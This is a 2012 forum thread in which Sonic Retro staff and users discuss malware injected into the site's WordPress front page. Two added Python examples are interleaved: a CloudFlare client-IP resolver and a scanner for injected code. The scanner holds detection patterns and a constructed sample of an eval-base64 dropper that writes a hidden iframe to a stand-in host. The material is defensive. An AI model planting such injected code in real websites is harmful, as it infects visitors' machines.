Sonic and Sega Retro Message Board: UPDATE: Malware distributed through Front Page

UPDATE: Malware distributed through Front Page

#1 User is offline SeanieB 

Posted 21 July 2012 - 09:08 PM

  • errno -1 (Not system error)
  • Posts: 435
  • Joined: 26-February 08
  • Gender:Male
  • Location:San Diego, CA
  • Project:Fixing Sonic Retro
  • Wiki edits:12
Quick note to those who do not check the front page:

Malware was detected embedded in the WordPress code, and could have been there as far back as June 23rd.

I found a file full of potentially infected hosts, hosted here: https://blessedra.in.../docs/hits.html

As far as I know it only infects Internet Explorer and Firefox users with out-of-date Java installed. If your IP is on that list, I urge you to check your machine.

#2 User is offline Chibisteven 

Posted 21 July 2012 - 10:55 PM

  • Posts: 1176
  • Joined: 20-August 08
  • Gender:Male
  • Location:US
  • Wiki edits:11
Yes, I found it odd that Avast said malware on the network bound traffic scanner. At least I know I wasn't crazy.

Edit: My IP is on the list, yes. But nothing is on my machine... My Anti-Virus has been very good at stopping infections before they get on my machine and do damage. It can detect while .zip files download and attempt to remove them during the download before they even get on my hard drive. It's why my Sonic 2HD demo download kept getting corrupted and unreadable.

But I'm double-checking again to be sure.

2nd Edit: I'd like to add that I'm checking right now and will post anything suspicious that I find. I keep all parts of Windows fully up to date. HijackThis, I see nothing odd there. Anti-Virus and Anti-Spyware check in progress.

3rd edit: Nothing found.
This post has been edited by Chibisteven: 22 July 2012 - 01:37 AM

#3 User is offline SoullessSentinel 

Posted 22 July 2012 - 06:28 AM

  • Posts: 246
  • Joined: 01-October 05
  • Gender:Male
  • Location:Grimsby, England
  • Project:Sonic 1 32X Remix
My IP is also on this list, my usual antivirus found nothing, but I am currently doing a scan with malwarebytes. Thanks for the heads up.

Is there any information available on the nature of this malware?

#4 User is offline Chibisteven 

Posted 22 July 2012 - 08:30 AM

  • Posts: 1176
  • Joined: 20-August 08
  • Gender:Male
  • Location:US
  • Wiki edits:11
Kind of curious how it got there in the first place on the front page.
This post has been edited by Chibisteven: 22 July 2012 - 08:36 AM

#5 User is offline Vinchenz 

Posted 22 July 2012 - 11:11 AM

  • Yo! Hustle! Hustle!
  • Posts: 1393
  • Joined: 10-January 10
  • Gender:Male
  • Location:Canada
  • Project:Unity 5evr
I was wondering why my computer picked up a virus. I haven't got one since before college...

Regardless, Avast! cleaned it up for me so it's not a fatal kind of virus at least.

#6 User is offline Shadow Fire 

Posted 22 July 2012 - 11:18 AM

  • Ultimate victory!
  • Posts: 1557
  • Joined: 05-February 05
  • Gender:Male
  • Location:The Land of Darkness
  • Project:Sonic: The Lost Land (Series), The GCN (site)
  • Wiki edits:60
I was wondering why NOD32 was picking up virii at this site. Glad I invested in it.

#7 User is offline GeneHF 

Posted 22 July 2012 - 02:40 PM

  • SEGA-ier than you'll potentially ever be.
  • Posts: 8373
  • Joined: 16-May 04
  • Gender:Male
  • Location:Scenic Studiopolis
  • Project:Complete Global Conquest
  • Wiki edits:381
IP was on list, no hits from avast and Bytes.

(shruuuuug)

#8 User is offline Kharen 

Posted 22 July 2012 - 02:53 PM

  • Posts: 493
  • Joined: 29-October 11
  • Gender:Male
  • Location:Eastern Washington University
I have Internet Explorer, but I only ever use Chrome. Is that a problem?

#9 User is offline SeanieB 

Posted 22 July 2012 - 02:55 PM

  • errno -1 (Not system error)
  • Posts: 435
  • Joined: 26-February 08
  • Gender:Male
  • Location:San Diego, CA
  • Project:Fixing Sonic Retro
  • Wiki edits:12
Kharen, on 22 July 2012 - 02:53 PM, said:

I have Internet Explorer, but I only ever use Chrome. Is that a problem?


Nope, you'd have known if something had happened: you'd have gotten a broken page and Java would have popped up, and you'd have had to actually be using IE at the time.

#10 User is offline SeanieB 

Posted 23 July 2012 - 02:51 AM

  • errno -1 (Not system error)
  • Posts: 435
  • Joined: 26-February 08
  • Gender:Male
  • Location:San Diego, CA
  • Project:Fixing Sonic Retro
  • Wiki edits:12
While I have the ability to, I thought I'd give you all an update.

I've disinfected the home page, and we've switched Retro over to a CloudFlare setup.

CloudFlare is basically this really fancy service that a lot of people are using these days, which claims to protect and speed up websites by bringing advantages of "the cloud" to conventional sites. Because the system they use is so simple, it's also quite a bit less susceptible to security problems than the webserver we use.

They also actively monitor incoming connections for people doing things they shouldn't do, and challenge their ability to connect to the site.

Being in the cloud, it geographically distributes cached content from the site, so people far away from Retro's actual server may notice an increase in speed, and it reduces Retro's bandwidth usage as well.

It's not perfect though. You may notice occasional CloudFlare error pages, or sometimes CloudFlare goes down when the site does not. I made a whole report and everyone else weighed the options and decided to just use CloudFlare, that the potential hiccups every so often were worth the no-effort security layer.

Some people may still not be able to reach Retro yet because we had to overhaul the DNS setup to use Cloudflare. Everyone should hopefully be caught up within a matter of hours after this post. If you know someone who's STILL stuck over 4 hours past the timestamp on this post, let me know.
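
One practical consequence of the CloudFlare move described above, as an added example that is not part of the post or of Retro's setup: once a reverse proxy sits in front of the origin, the origin's access logs (and any hit list built from them, like the one in the first post) record the proxy's addresses rather than the visitor's. The visitor's address is carried in a request header, and that header only means something when the TCP peer really is the proxy; a direct connection to the origin can set it to anything. The proxy ranges below are constructed placeholders, not CloudFlare's published ranges, and the sample requests are constructed too.

```python
"""
Added example, not from the thread: recover the real client address behind a
reverse proxy such as CloudFlare, trusting the proxy's header only when the
request actually arrived from one of the proxy's configured ranges.
The ranges below are constructed placeholders, not CloudFlare's published list.
"""
import ipaddress
from typing import Dict, List

# Assumption: the operator keeps the proxy's egress ranges here and refreshes them.
TRUSTED_PROXY_NETS = [ipaddress.ip_network(n) for n in ("203.0.113.0/24", "2001:db8:cf::/48")]
# CloudFlare carries the original client address in this header (compared case-insensitively).
CLIENT_IP_HEADER = "cf-connecting-ip"


def is_trusted_proxy(peer_ip: str) -> bool:
    """True when the TCP peer belongs to one of the configured proxy ranges."""
    addr = ipaddress.ip_address(peer_ip)
    return any(addr in net for net in TRUSTED_PROXY_NETS)


def client_ip(peer_ip: str, headers: Dict[str, str]) -> str:
    """Address to log or block for this request.

    Honour the proxy header only when the peer is the proxy and the header holds
    exactly one valid address; otherwise fall back to the peer itself, which for a
    direct connection that bypassed the proxy is the real client.
    """
    if is_trusted_proxy(peer_ip):
        raw = next((v for k, v in headers.items() if k.lower() == CLIENT_IP_HEADER), "").strip()
        try:
            return str(ipaddress.ip_address(raw))
        except ValueError:
            pass  # malformed or missing header: do not trust it
    return peer_ip


def resolve_log(requests: List[dict]) -> List[str]:
    """Resolve a list of {'peer': ..., 'headers': {...}} records to client addresses."""
    return [client_ip(r["peer"], r.get("headers", {})) for r in requests]


# Constructed sample requests: two that came through the proxy, one spoof attempt,
# one proxied request with a garbage header.
SAMPLE_REQUESTS = [
    {"peer": "203.0.113.10", "headers": {"CF-Connecting-IP": "198.51.100.23"}},
    {"peer": "2001:db8:cf::1", "headers": {"cf-connecting-ip": "2001:db8:1234::7"}},
    # Direct hit on the origin claiming to be someone else: the header is ignored.
    {"peer": "192.0.2.99", "headers": {"CF-Connecting-IP": "198.51.100.23"}},
    # Proxy peer but unparsable header: fall back to the peer rather than logging junk.
    {"peer": "203.0.113.11", "headers": {"CF-Connecting-IP": "not-an-ip"}},
]

if __name__ == "__main__":
    for req, ip in zip(SAMPLE_REQUESTS, resolve_log(SAMPLE_REQUESTS)):
        print(f"peer={req['peer']:<16} -> client={ip}")
```

The same check is what an origin firewall should enforce at the network layer: if anyone can reach the web server directly, the proxy's monitoring and challenges are simply bypassed, and the header logic above is the last line of defence for attribution, not for access control.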

#11 User is offline SpeedStarTMQ 

Posted 23 July 2012 - 03:23 AM

  • Posts: 2259
  • Joined: 20-April 10
  • Gender:Male
  • Location:London, England
  • Project:Playing Wii U - ADD ME.
  • Wiki edits:5
Any idea on the nature of the Malware?

#12 User is offline SeanieB 

Posted 23 July 2012 - 03:29 AM

  • errno -1 (Not system error)
  • Posts: 435
  • Joined: 26-February 08
  • Gender:Male
  • Location:San Diego, CA
  • Project:Fixing Sonic Retro
  • Wiki edits:12
I went over it in the original post, all it was was a Wordpress "0-day" exploit that tried to exploit outdated versions of Java and Adobe Reader in vulnerable Firefox and IE versions, and dropped a list of IPs it tried to infect on the server to come back and get later.

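The post above describes injected code living inside the WordPress files and serving an exploit to out-of-date browser plugins. As an added example that is not code from the thread or from Retro's install, the scanner below walks a web root for the injection shapes that 2012-era drive-by kits commonly left in PHP and theme files: a decoder feeding eval(), the preg_replace /e modifier, 1-pixel iframes, document.write(unescape(...)) and very long base64-looking literals. The regexes are generic heuristics (an assumption about what injected code usually looks like, not a signature of this incident), the directory layout and file contents written by demo() are constructed samples, and example.invalid is a reserved hostname rather than a real landing page.

```python
"""
Added example, not code from the Sonic Retro thread or its WordPress install:
a heuristic scanner for code injected into PHP/JS/HTML files under a web root.
The indicators are generic assumptions, and the files demo() writes are
constructed samples.
"""
import base64
import os
import re
import tempfile
from typing import Dict, List

# Heuristic indicators of injected code.
INDICATORS = {
    # eval() fed by a decoder is the classic hidden PHP dropper/backdoor shape.
    "php_eval_decode": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    # preg_replace with the /e modifier executes the replacement as PHP.
    "php_preg_e_modifier": re.compile(r"preg_replace\s*\(\s*['\"].*?/\w*e\w*['\"]", re.I),
    # A 0/1 pixel iframe is how exploit-kit landing pages were pulled into a page.
    "hidden_iframe": re.compile(r"<iframe[^>]*(?:width|height)\s*=\s*['\"]?[01]\b[^>]*>", re.I),
    # Obfuscated JavaScript writer.
    "js_unescape_write": re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I),
    # Very long base64-looking literals deserve a manual look.
    "long_b64_literal": re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]"),
}


def scan_text(text: str) -> List[str]:
    """Return the names of every indicator that fires on one file's contents."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_tree(root: str, exts=(".php", ".js", ".html")) -> Dict[str, List[str]]:
    """Walk a web root and map each flagged file (path relative to root) to its hits."""
    findings: Dict[str, List[str]] = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8", errors="replace") as f:
                    hits = scan_text(f.read())
            except OSError:
                continue
            if hits:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings


# Constructed samples. The tampered footer decodes to a hidden iframe pointing at
# the reserved example.invalid host; no real landing page is referenced.
CLEAN_FUNCTIONS_PHP = "<?php\nfunction retro_setup() { add_theme_support('post-thumbnails'); }\n"
_PAYLOAD = ("if(!isset($_COOKIE['__utma'])){echo '<iframe src=\"http://example.invalid/in.php\""
            " width=\"1\" height=\"1\" style=\"visibility:hidden\"></iframe>';}")
INJECTED_FOOTER_PHP = ("<?php\n/* tampered footer.php (constructed sample) */\n"
                       "eval(base64_decode('" + base64.b64encode(_PAYLOAD.encode()).decode() + "'));\n"
                       "?>\n</body></html>\n")
INJECTED_INDEX_HTML = ('<html><body>home</body>\n<iframe src="http://example.invalid/x.php" '
                       'width="1" height="1" style="visibility:hidden"></iframe></html>\n')


def demo() -> Dict[str, List[str]]:
    """Write the samples into a throwaway tree shaped like a WordPress theme and scan it."""
    root = tempfile.mkdtemp(prefix="wpscan_")
    os.makedirs(os.path.join(root, "wp-content", "themes", "retro"))
    for rel, body in (("wp-content/themes/retro/functions.php", CLEAN_FUNCTIONS_PHP),
                      ("wp-content/themes/retro/footer.php", INJECTED_FOOTER_PHP),
                      ("index.html", INJECTED_INDEX_HTML)):
        with open(os.path.join(root, *rel.split("/")), "w", encoding="utf-8") as f:
            f.write(body)
    return scan_tree(root)


if __name__ == "__main__":
    for path, hits in sorted(demo().items()):
        print(f"{path}: {', '.join(hits)}")
```

Heuristics like these find the obvious cases; the reliable check is a diff of the live tree against a pristine copy of the same WordPress, plugin and theme versions, which also catches an injection with none of the patterns above.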
#13 User is offline Caniad Bach 

Posted 23 July 2012 - 09:52 AM

  • is a peanut
  • Posts: 1822
  • Joined: 18-March 10
  • Gender:Not Telling
  • Location:Cardiff
AVG just blocked an "Exploit Blackhole Exploit Kit (type 2170)" from me just opening up the RSS feed o.0

#14 User is offline PicklePower 

Posted 23 July 2012 - 08:01 PM

  • Posts: 575
  • Joined: 15-April 04
  • Gender:Male
  • Wiki edits:2,809
Would someone be able to explain how it was possible to list which IP addresses were affected, and why that list was hosted outside of Retro?

#15 User is offline SeanieB 

Posted 23 July 2012 - 08:02 PM

  • errno -1 (Not system error)
  • Posts: 435
  • Joined: 26-February 08
  • Gender:Male
  • Location:San Diego, CA
  • Project:Fixing Sonic Retro
  • Wiki edits:12
Read my post, and I hosted it outside of Retro because retro was down when the story broke.
